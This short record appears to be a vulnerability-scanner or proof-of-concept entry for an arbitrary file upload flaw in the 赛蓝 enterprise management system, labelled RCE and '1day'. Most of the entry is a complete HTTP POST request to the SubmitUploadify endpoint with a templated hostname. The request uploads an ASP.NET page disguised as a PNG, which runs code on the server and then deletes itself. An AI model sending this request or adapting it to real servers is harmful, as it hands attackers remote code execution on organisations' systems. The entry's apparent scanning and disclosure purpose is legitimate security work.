vendor = "赛蓝"
name = "赛蓝企业管理系统-SubmitUploadify-任意文件上传漏洞"
type = "RCE"
version = "未知"
path = "/EHRModule/EHR_Holidays/SubmitUploadify"
detail = "POST /EHRModule/EHR_Holidays/SubmitUploadify?FolderId=1&UserId=1 HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ ------WebKitFormBoundaryD5Mawpg068t7pbxZ Content-Disposition: form-data; name=\"Filedata\"; filename=\"1.aspx\" Content-Type: image/png <%@ Page Language=\"C#\"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %> ------WebKitFormBoundaryD5Mawpg068t7pbxZ--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
